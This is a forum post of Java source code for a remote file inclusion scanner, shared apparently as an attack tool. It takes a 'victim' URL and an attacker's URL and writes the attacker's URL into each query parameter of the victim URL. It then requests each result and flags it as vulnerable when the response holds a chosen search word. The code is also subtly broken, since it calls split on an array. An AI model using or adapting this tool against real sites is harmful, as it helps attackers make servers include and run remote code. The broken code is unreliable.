RFI Scanner (Java)

[hozarares]

:::=== RFISCANNER.JAVA ===:::

package rrfiscanner;

import java.io.BufferedReader;

import java.io.IOException;

import java.io.InputStreamReader;

import java.net.MalformedURLException;

import java.net.Proxy;

import java.net.URL;

import java.net.URLConnection;

public class RfiScanner {

private Proxy _conProxy;

private boolean _useProxy;

private String _SEARCH_WORD;

private String _vUrl,_aUrl;

/**

* @param args

*/

public RfiScanner(String vUrl,String aUrl) {

this._vUrl = vUrl;

this._aUrl = aUrl;

}

public void setUseProxy(boolean use){

this._useProxy = use;

}

public void setProxy(Proxy proxy){

this._conProxy = proxy;

}

public void setSearchWord(String word){

this._SEARCH_WORD = word;

}

public void scan(){

try {

PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);

URLConnection uc = null;

while(victimURL.hasNext()) {

URL u = victimURL.next();

if (_useProxy) {

uc = u.openConnection(_conProxy);

} else {

uc = u.openConnection();

}

try{

System.out.println("SCANNING: " + u.toString());

BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream()));

String c;

while ((c = r.readLine()) != null) {

if(c.indexOf(_SEARCH_WORD) != -1) {

System.out.println("VULNERABLE URL: " + u.toString());

break;//stop searching

}

}

}catch(IOException ioe){

//well do nothing

}

}

} catch (MalformedURLException mfue) {

System.err.println(mfue.toString());

} catch (Exception e) {

System.err.println(e.toString());

}

}

}

:::=== PREPAREURL.JAVA ===:::

package rrfiscanner;

import java.net.MalformedURLException;

import java.net.URL;

import java.util.ArrayList;

import java.util.HashMap;

import java.util.Iterator;

import java.util.Set;

public class PrepareURL {

private static final int _nextItemInitialize = -1;

private String _victimURL;

private String _evilUrl;

private ArrayList<URL> _attackUrlList;

private int _nextItem;

/**

* @param victimUrl The URL of the site you want to inject stuff into it's params

* @param attackUrl The "stuff"

* @throws MalformedURLException Wrong URL

*/

public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException {

this._victimURL = victimUrl;

this._evilUrl = attackUrl;

_nextItem = _nextItemInitialize;

fillList();

}

/**

* @return True if there is another element left, false otherwise

*/

public boolean hasNext() {

if(_nextItem == (_attackUrlList.size()-1)) {

return false;

}

return true;

}

/**

* @return Get the next url

*/

public URL next() {

_nextItem++;

return _attackUrlList.get(_nextItem);

}

/**

* This resets the class so you can loop again through the URL's

*/

public void reset() {

_nextItem = _nextItemInitialize;

}

private void fillList() throws MalformedURLException {

String query = _victimURL.substring(_victimURL.indexOf("?")+1);

_attackUrlList = new ArrayList<URL>();

if(query != null) {

HashMap<String,String> paramPairs = getParameters(query);

Set<String> paramNames = paramPairs.keySet();

Iterator<String> iParamNames = paramNames.iterator();

String str;

while(iParamNames.hasNext()) {

str = iParamNames.next();

_attackUrlList.add(new URL(_victimURL.replace(str+"="+paramPairs.get(str), str+"="+_evilUrl)));

}

}

}

/**

* @param query The query to be stripped down to parameters and it's values

* @return A HashMap with paramname:paramvalue

*/

private HashMap<String,String> getParameters(String query) {

HashMap<String,String> paramPairs = new HashMap<String,String>();

String[] rawPairs = query.split("&");

for(int i=0;i<rawPairs.length;i++) {

String[] keyValue = rawPairs.split("=");

for(int z=0;z<keyValue.length;z+=2) {

paramPairs.put(keyValue[z], keyValue[z+1]);

}

}

return paramPairs;

}

}

Edited December 4, 2009 by hozarares

[p3tru]

<code> text </code>